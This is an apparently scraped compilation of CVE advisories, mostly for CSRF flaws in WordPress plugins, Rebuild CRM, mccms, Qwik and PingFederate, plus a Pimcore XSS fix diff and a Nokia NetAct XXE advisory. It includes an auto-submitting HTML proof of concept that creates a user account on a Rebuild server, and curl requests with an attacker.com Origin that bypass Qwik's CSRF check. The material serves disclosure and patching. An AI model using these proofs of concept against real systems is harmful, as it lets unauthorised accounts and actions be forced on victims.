Cross-Site Request Forgery (CSRF) vulnerability in Tips and Tricks HQ, Ruhul Amin Category Specific RSS feed Subscription plugin <= v2.1 versions.

**Solution**

Update the WordPress Category Specific RSS feed Subscription plugin to the latest available version (at least v2.2).

Found this useful? Thank yuyudhn for reporting this vulnerability. Buy a coffee ☕

yuyudhn discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Category Specific RSS feed Subscription Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has been fixed in version v2.2.

**2 other known vulnerabilities for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2023-22691: WordPress Category Specific RSS feed Subscription plugin <= v2.1 - Cross Site Request Forgery (CSRF) vulnerability - Patchstack

A vulnerability has been found in Rebuild 3.2 and classified as problematic. This vulnerability affects unknown code. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to change the configuration settings. VDB-227866 is the identifier assigned to this vulnerability.

如确认漏洞，恳请厂商回复确认漏洞帮助测试人员备案，谢谢！

**版本 / Version**

V3.2 版本

**什么问题 / What's the problem**

部门用户创建接口存在CSRF漏洞  
  
接口正常请求报文如下：  
  
可以看到Content-Type默认为text/plain，且数据以json格式传输，因为cookie跨域限制不严导致可构造恶意网页实现CSRF漏洞

**如何复现此问题 / How to reproduce this problem**

构造POC如下：

    <html>
      
      <body>
        <form action="https://nightly.getrebuild.com/app/entity/record-save" method="POST" enctype="text/plain">
          <input type="hidden" name="&#123;&quot;loginName&quot;&#58;&quot;syh2&quot;&#44;&quot;password&quot;&#58;&quot;buy8l9rB&#33;8&quot;&#44;&quot;gangwei6&quot;&#58;&quot;668&#45;01871e762adb15ce&quot;&#44;&quot;gerendianhua&quot;&#58;&quot;&quot;&#44;&quot;createdBy&quot;&#58;&quot;001&#45;0000000000000001&quot;&#44;&quot;createdOn&quot;&#58;&quot;2023&#45;04&#45;17&#32;01&#58;36&#58;41&quot;&#44;&quot;fullName&quot;&#58;&quot;syh&quot;&#44;&quot;email&quot;&#58;&quot;su&#64;123&#46;com&quot;&#44;&quot;workphone&quot;&#58;&quot;13684122536&quot;&#44;&quot;deptId&quot;&#58;&quot;002&#45;0186693a0e7903c3&quot;&#44;&quot;metadata&quot;&#58;&#123;&quot;entity&quot;&#58;&quot;User&quot;&#44;&quot;id&quot;&#58;&quot;&quot;&#125;&#44;&quot;hack&quot;&#58;&quot;" value="&quot;&#125;" />
          <input type="submit" value="Submit request" />
        </form>
        <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
        </script>
      </body>
    </html>
    

正常POST表单会有=导致json格式错误，我们可以通过构造name value使其拼接，从而使=成为字段值，效果如下

          <input type="hidden" name="{"loginName":"syh2","password":"buy8l9rB!8","gangwei6":"668-01871e762adb15ce","gerendianhua":"","createdBy":"001-0000000000000001","createdOn":"2023-04-17 01:36:41","fullName":"syh","email":"su@123.com","workphone":"13684122536","deptId":"002-0186693a0e7903c3","metadata":{"entity":"User","id":""},"hack":"" value=""}" />
    

**利用测试**  
使用POC搭建网页，访问该恶意网站：  
  
可以看到成功调用接口，成功添加账户  

**漏洞修复建议**

限制Content-Type为application/json  
或对cookie增加跨域限制，即SameSite设置为Lax

**测试单位**

山东大学网络空间安全学院

CVE-2023-2474: 部门用户创建接口存在CSRF漏洞 · Issue #I6W4M2 · RB企业管理系统/rebuild_CRM_ERP_库存生产管理系统 - Gitee.com

Mattermost Desktop App fails to validate a mattermost server redirection and navigates to an arbitrary website


CVE-2023-2000: Security Updates

mccms v2.6.3 is vulnerable to Cross Site Request Forgery (CSRF).

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2023-29815: Under v2.6.3, your project has a CSRF vulnerability · Issue #3 · chshcms/mccms

Concrete CMS (previously concrete5) before 9.1 did not have a rate limit for password resets.

CVE-2023-28821: Releases · concretecms/concretecms

Cross-site Scripting (XSS) - Generic in GitHub repository pimcore/pimcore prior to 10.5.21.

Expand Up

@@ -29,6 +29,7 @@

use Pimcore\\Http\\ResponseHelper;

use Pimcore\\Logger;

use Pimcore\\Model\\User;

use Pimcore\\Security\\SecurityHelper;

use Pimcore\\Tool;

use Pimcore\\Tool\\Authentication;

use Symfony\\Component\\HttpFoundation\\RedirectResponse;

Expand Down Expand Up

@@ -114,7 +115,7 @@ public function loginAction(Request $request, CsrfProtectionHandler $csrfProtect

$params\['csrfTokenRefreshInterval'\] = ((int)$session\_gc\_maxlifetime - 60) \* 1000;

  

if ($request\->get('too\_many\_attempts')) {

$params\['error'\] = $request\->get('too\_many\_attempts');

$params\['error'\] = SecurityHelper::convertHtmlSpecialChars($request\->get('too\_many\_attempts'));

}

if ($request\->get('auth\_failed')) {

$params\['error'\] = 'error\_auth\_failed';

Expand Down

CVE-2023-2341: fixed xss on login page (#14975) · pimcore/pimcore@66f1089

Cross-Site Request Forgery (CSRF) in GitHub repository builderio/qwik prior to 0.104.0.



**Description**

URL parsing with Qwik uses the new URL(a, b) constructor. A little-known fact about this constructor is that if an attacker controls a they have complete control of the finally resolved URL.

For example:

    const url = new URL(attacker_value, "http://localhost")
    

By entering //test.com, we can change the origin to resolve to http://test.com.

**Qwik URL Resolution**

The getUrl function is used in production and development node servers link.

    export function getUrl(req: IncomingMessage) {
      const origin = ORIGIN ?? getOrigin(req);
      return new URL((req as any).originalUrl || req.url || '/', origin);
    }
    

This follows the earlier vulnerable pattern, and the origin can be controlled.

Cloudflare, Vercel and other deployments which do not use this mechanism are not vulnerable.

**Proof of Concept**

Start any node Qwik Server.

For simplicity, I am using curl to simulate the request from the browser. In this case, the origin is "attacker.com". An actual attack would use the victim's web browser to send these requests and be unable to edit headers manually.

Observe curl -X POST http://localhost:5173/ -H "Origin: http://attacker.com" causes a CSRF error

Observe curl -X POST http://localhost:5173//attacker.com/ -H "Origin: http://attacker.com" does not cause a CSRF error!

**The internal URL now points to http://attacker.com; Qwik thinks it's attacker.com!**

**Impact**

Bypass of CSRF protections.

The result is the ability to modify user resources, provided they have an active session and are using SameSite: None for session cookies.

**Occurrences**

CVE-2023-2307: CSRF bypass in qwik

Cross-Site Request Forgery (CSRF) in GitHub repository builderio/qwik prior to 0.104.0.

@@ -0,0 +1,37 @@

import { test } from 'uvu';

import { equal } from 'uvu/assert';

import { normalizeUrl } from './http';

  

\[

{

url: '/',

base: 'https://qwik.dev',

expect: 'https://qwik.dev/',

},

{

url: '/attacker.com',

base: 'https://qwik.dev',

expect: 'https://qwik.dev/attacker.com',

},

{

url: '//attacker.com',

base: 'https://qwik.dev',

expect: 'https://qwik.dev/attacker.com',

},

{

url: '\\\\\\\\attacker.com',

base: 'https://qwik.dev',

expect: 'https://qwik.dev/attacker.com',

},

{

url: '/some-path//attacker.com',

base: 'https://qwik.dev',

expect: 'https://qwik.dev/some-path/attacker.com',

},

\].forEach((t) \=> {

test(\`normalizeUrl(${t.url}, ${t.base})\`, () \=> {

equal(normalizeUrl(t.url, t.base).href, t.expect);

});

});

  

test.run();

CVE-2023-2307: fix: relative protocol urls · BuilderIO/qwik@09190b7

The PingFederate Local Identity Profiles '/pf/idprofile.ping' endpoint is vulnerable to Cross-Site Request Forgery (CSRF) through crafted GET requests.

CVE-2022-40724: We’re here to help

An XXE issue was discovered in Nokia NetAct before 22 FP2211 via an XML document to the Configuration Dashboard page. Input validation and a proper XML parser configuration are missing. For an external attacker, it is very difficult to exploit this, because a few dynamically created parameters such as Jsession-id, a CSRF token, and an Nxsrf token would be needed. The attack can realistically only be performed by an internal user.

Nokia

**Vulnerable software**

NetAct v 20.1

**Severity level**

Severity level: Medium  
Impact: XML External Entity (XXE)  
Access Vector: Remote  

CVSS v3.1  
Base Score: 5,8  
Vector: (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/MAV:L/MAC:H/MPR:L/MUI:N/MS:U/MC:H/MI:L/MA:L)

CVE-2023-26057

**Vulnerability description:**

Input validation and proper XML parsers configuration was missing. On the Configuration Dashboard page, an attacker can import XML files. Support of external entities (External Entity) is enabled for processing of such files, which leads to Arbitrary File Read and SSRF. The attack can only be performed by an internal user. The vulnerability is fixed in NetAct 22 FP2211 and onwards.

**Advisory status**

10.10.2022 - Vendor gets vulnerability details

**Credits**

The vulnerability was detected by Vladimir Razov and Aleksandr Ustinov (Positive Technologies)

Tag

#csrf